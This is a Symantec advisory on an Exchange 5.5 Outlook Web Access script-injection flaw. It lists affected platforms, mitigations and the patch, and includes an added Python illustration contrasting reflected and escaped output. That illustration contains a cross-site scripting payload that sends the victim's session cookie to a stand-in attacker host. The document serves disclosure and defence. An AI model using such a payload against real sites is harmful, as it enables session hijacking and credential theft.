
Microsoft Exchange Outlook Web Access Script Injection Vulnerability

Risk
Medium

Date Discovered
08-10-2004

Description
Microsoft Exchange Outlook Web Access (OWA) is prone to a vulnerability that may permit remote attackers to inject hostile script code into client sessions.

Because the injected script runs in the security context of the OWA site, it can access properties of the OWA server and of the Web pages hosted on that site.

Note that the attacker must authenticate to OWA to be in a position to exploit this issue. If successfully exploited, this could allow for various attacks, such as session hijacking and content spoofing. This issue could also be used to exploit latent vulnerabilities in Web client software.
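The following is an added illustration of the vulnerability class described above, not code from Exchange, OWA or the advisory. It assumes a hypothetical OWA-style page that echoes a "folder" query parameter into its HTML; the parameter name, the template and the attack URL are constructed for the demonstration. The vulnerable handler reflects the value verbatim, so a script tag in the request becomes script executing in the victim's authenticated OWA session (the session-hijacking case the advisory mentions); the hardened handler HTML-encodes the value before placing it in the page.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for a page that echoes a request parameter. This is
# illustration code, not Exchange/OWA source; "folder" is a hypothetical
# parameter name chosen for the example.
def _page(value: str) -> str:
    return "<html><body><p>Requested folder: " + value + "</p></body></html>"

def _folder_param(url: str) -> str:
    qs = parse_qs(urlparse(url).query)
    return qs.get("folder", [""])[0]

def render_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim: the script-injection pattern."""
    return _page(_folder_param(url))

def render_hardened(url: str) -> str:
    """Same page, but the value is HTML-encoded (including quotes) so it
    stays inside the text node and cannot introduce markup or script."""
    return _page(html.escape(_folder_param(url), quote=True))

def executes_script(page: str) -> bool:
    """Crude check used by the demonstration: does a raw <script tag
    appear in the response? Encoded output (&lt;script&gt;) does not match."""
    return "<script" in page.lower()

# Constructed attack URL: the payload ships the victim's OWA cookie to a
# hypothetical attacker host. %2B decodes to '+'.
ATTACK_URL = (
    "https://owa.example/exchange/?folder="
    "<script>document.location='http://attacker.example/?c='"
    "%2Bdocument.cookie</script>"
)
BENIGN_URL = "https://owa.example/exchange/?folder=Inbox"

if __name__ == "__main__":
    print("vulnerable:", executes_script(render_vulnerable(ATTACK_URL)))  # True
    print("hardened:  ", executes_script(render_hardened(ATTACK_URL)))    # False
```

Encoding at the point of output is the fix that the vendor patch corresponds to in spirit; the network, browser-hardening and SSL recommendations below reduce exposure and limit consequences but do not remove the injection itself.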

Platforms Affected
Microsoft BackOffice 4.5
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 SP1
Microsoft Windows NT 4.0 SP2
Microsoft Windows NT 4.0 SP3
Microsoft Windows NT 4.0 SP4
Microsoft Windows NT 4.0 SP5
Microsoft Windows NT 4.0 SP6
Microsoft Windows NT 4.0 SP6a

Components Affected
Microsoft Exchange Server 5.5 SP4

Recommendations
Block external access at the network boundary, unless the service is required by external parties.
Use network access controls to explicitly restrict external access by untrusted networks and hosts. Permit access for trusted networks and hosts only.

Disallow anonymous access to services. Permit access for trusted individuals only.
Only permit anonymous access to the service if it is an explicit requirement. This will reduce exposure to exploitation of this and other latent vulnerabilities.

Run all client software as a non-privileged user with minimal access rights.
As a general security precaution against Web browser attacks, users should perform non-administrative tasks as an unprivileged user with minimal access rights.

Set web browser security to disable the execution of script code or active content.
Disabling support for client-side scripting and active content may limit exposure to the consequences of this and other latent vulnerabilities.

Communicate sensitive information over encrypted channels.
Access to Outlook Web Access should occur over SSL-protected communication channels. This may limit the consequences of this issue.

Disable any services that are not needed.
If the Outlook Web Access service is not explicitly required, it should be disabled or removed on all Exchange servers where it is present.

Microsoft has released a Security Bulletin that includes fixes to address this issue.


Microsoft Exchange Server 5.5 SP4:

Microsoft Patch Security Update for Exchange 5.5 (KB842436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=66E4E033-5A4C-4EEC-84F1-31F0CA878092&displaylang=en

References
Source: Microsoft Security Bulletin MS04-026
URL: http://www.microsoft.com/technet/security/bulletin/ms04-026.mspx

Credits
Discovery is credited to Amit Klein.


Copyright (c) 2004 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Security Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from symsecurity@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Symantec, Symantec products, Symantec Security Response, and SymSecurity are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners.